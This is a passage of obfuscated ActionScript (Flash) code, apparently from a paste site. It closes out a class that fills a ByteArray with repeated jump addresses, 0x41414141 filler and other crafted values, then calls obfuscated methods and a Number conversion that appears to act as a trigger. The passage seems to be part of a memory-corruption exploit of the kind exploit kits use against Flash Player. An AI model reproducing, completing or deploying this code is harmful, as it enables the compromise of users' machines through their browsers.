  723. this.pokeg.writeUnsignedInt(this.jump4);
  724. this.pokeg.writeUnsignedInt(0x1000);
  725. this.pokeg.writeUnsignedInt(this.buttkk);
  726. this.pokeg.writeUnsignedInt(0x41414141);
  727. this.pokeg.writeUnsignedInt(this.dipseu);
  728. this.pokeg.writeUnsignedInt(this.dipseu);
  729. this.pokeg.writeUnsignedInt(this.dipseu);
  730. this.pokeg.writeUnsignedInt(this.dipseu);
  731. this.pokeg.writeUnsignedInt(this.jump4);
  732. this.pokeg.writeUnsignedInt(0);
  733. this.pokeg.writeUnsignedInt(this.buttkk);
  734. this.pokeg.writeUnsignedInt(0x41414141);
  735. this.pokeg.writeUnsignedInt(this.dipseu);
  736. this.pokeg.writeUnsignedInt(this.dipseu);
  737. this.pokeg.writeUnsignedInt(this.dipseu);
  738. this.pokeg.writeUnsignedInt(this.dipseu);
  739. this.pokeg.writeUnsignedInt(this.jump4);
  740. this.pokeg.writeUnsignedInt((this.jump4 + 1));
  741. this.pokeg.writeUnsignedInt(this.buttkk);
  742. this.pokeg.writeUnsignedInt(0x41414141);
  743. this.pokeg.writeUnsignedInt(this.dipseu);
  744. this.pokeg.writeUnsignedInt(this.dipseu);
  745. this.pokeg.writeUnsignedInt(this.dipseu);
  746. this.pokeg.writeUnsignedInt(this.dipseu);
  747. this.pokeg.writeUnsignedInt(this.jump4);
  748. this.pokeg.writeUnsignedInt(this.sobsft);
  749. this.pokeg.writeUnsignedInt(this.buttkk);
  750. this.pokeg.writeUnsignedInt(0x41414141);
  751. this.pokeg.writeUnsignedInt(this.fund2);
  752. }
  753. private function kahncl():void{
  754. this.sacs1y(this.bonom, this.wombu3);
  755. new Number(this.vola1.toString());
  756. }
  757.  
  758. }
  759. }//package
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement